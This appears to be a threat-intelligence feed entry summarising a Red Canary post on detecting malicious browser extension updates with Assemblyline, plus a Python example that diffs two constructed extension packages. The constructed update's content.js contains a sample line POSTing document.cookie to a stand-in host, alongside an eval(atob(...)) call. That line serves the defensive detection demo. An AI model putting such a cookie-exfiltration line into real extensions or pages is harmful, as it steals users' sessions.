
Moving up the Assemblyline: Exposing malicious code in browser extensions

ID: 79c9b122-6e3e-5bc6-b7de-f00c67455f81

STIX ID: report--79c9b122-6e3e-5bc6-b7de-f00c67455f81

Feed Name: Red Canary

Threat Score
75/100

Date Published: 2026-03-12

Date Updated: 2026-04-29

Author: Tre Wilkins

...
...

This blog post describes a proactive workflow that uses Assemblyline to detect malicious browser extension updates. Both the old and the new extension package are submitted for static analysis, the results are compared for differences (new domains, updated service workers or content scripts, new permissions, new Assemblyline detections, anomalous script characteristics), and alerts are raised from five tuned detection rules. Backtested against five real-world malicious extension updates, including the Cyberhaven and Trust Wallet compromises, the approach identified most of them.
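The comparison step the summary describes, as an added example that is not Red Canary's or Assemblyline's code: it diffs two constructed manifest-v3 packages held in memory and reports new permissions and host permissions, service worker or content scripts whose contents changed, domains referenced only by the new version, and a few anomalous-script heuristics (long string literals, eval/new Function, high entropy). The thresholds and heuristics are assumptions; the page's five tuned rules and Assemblyline's own detections are not reproduced, since the page does not show them.

```python
"""Diff an old and a new browser-extension package for the change classes the
workflow watches: new permissions, updated service worker / content scripts,
new domains, anomalous script characteristics.

Added example for this page; not code from Red Canary or Assemblyline. The two
packages below are constructed in memory and the thresholds are assumptions.
Assemblyline's own detections are not reproduced here."""

import json
import math
import re
from collections import Counter

# Host part of any http(s) URL embedded in script text.
URL_HOST_RE = re.compile(r"https?://([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", re.I)


def script_files(manifest):
    """Paths the manifest wires into execution: MV3 service worker + content scripts."""
    names = set()
    worker = manifest.get("background", {}).get("service_worker")
    if worker:
        names.add(worker)
    for entry in manifest.get("content_scripts", []):
        names.update(entry.get("js", []))
    return names


def domains_in(files):
    """Lower-cased hosts referenced by any .js file in the package."""
    hosts = set()
    for name, body in files.items():
        if name.endswith(".js"):
            hosts.update(h.lower() for h in URL_HOST_RE.findall(body))
    return hosts


def shannon_entropy(text):
    """Bits per character; packed or base64-heavy scripts run well above plain JS."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def anomalous(body, entropy_threshold=5.0, long_string=200):
    """Cheap static tells that a script deserves a look (thresholds are assumptions)."""
    reasons = []
    if shannon_entropy(body) > entropy_threshold:
        reasons.append("high entropy")
    if re.search(r"[\"'][^\"'\n]{%d,}[\"']" % long_string, body):
        reasons.append("long string literal")
    if re.search(r"\beval\s*\(|\bnew\s+Function\s*\(", body):
        reasons.append("dynamic code execution")
    return reasons


def diff_extensions(old, new):
    """old/new: {"manifest": dict, "files": {path: text}}. Returns only the
    classes of change that were observed, so an unchanged package yields {}."""
    om, nm = old["manifest"], new["manifest"]
    findings = {}
    for key in ("permissions", "host_permissions"):
        added = set(nm.get(key, [])) - set(om.get(key, []))
        if added:
            findings["new_" + key] = sorted(added)
    # A script counts as changed if it is new to the manifest or its body differs.
    changed = [p for p in sorted(script_files(nm))
               if old["files"].get(p) != new["files"].get(p)]
    if changed:
        findings["changed_scripts"] = changed
    new_domains = domains_in(new["files"]) - domains_in(old["files"])
    if new_domains:
        findings["new_domains"] = sorted(new_domains)
    anomalies = {p: anomalous(new["files"][p]) for p in changed if p in new["files"]}
    anomalies = {p: r for p, r in anomalies.items() if r}
    if anomalies:
        findings["anomalous_scripts"] = anomalies
    return findings


# Constructed sample: a benign 1.0.0 and an update that adds broad permissions,
# an extra endpoint and an encoded payload. Not real extensions.
_BASE_MANIFEST = {
    "manifest_version": 3,
    "name": "Example Helper",
    "background": {"service_worker": "sw.js"},
    "content_scripts": [{"matches": ["https://app.example.com/*"], "js": ["content.js"]}],
}
OLD = {
    "manifest": {**_BASE_MANIFEST, "version": "1.0.0", "permissions": ["storage"],
                 "host_permissions": ["https://app.example.com/*"]},
    "files": {
        "sw.js": "chrome.runtime.onInstalled.addListener(() => console.log('ready'));\n",
        "content.js": "fetch('https://app.example.com/api/ping');\n",
    },
}
NEW = {
    "manifest": {**_BASE_MANIFEST, "version": "1.0.1", "permissions": ["storage", "cookies"],
                 "host_permissions": ["<all_urls>"]},
    "files": {
        "sw.js": OLD["files"]["sw.js"],
        "content.js": (
            "fetch('https://app.example.com/api/ping');\n"
            "const p = '" + "QUJD" * 60 + "';\n"
            "eval(atob(p));\n"
            "fetch('https://cdn-telemetry.example.net/c', "
            "{method: 'POST', body: document.cookie});\n"
        ),
    },
}

if __name__ == "__main__":
    print(json.dumps(diff_extensions(OLD, NEW), indent=2))
```

Running the block prints the findings for the constructed update: the added `cookies` and `<all_urls>` permissions, `content.js` as the only changed script, the one new domain, and the long-string and eval tells on that script. Submitting `OLD` against itself yields an empty dict, which is the property an alerting rule wants before it is tuned on real update pairs.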
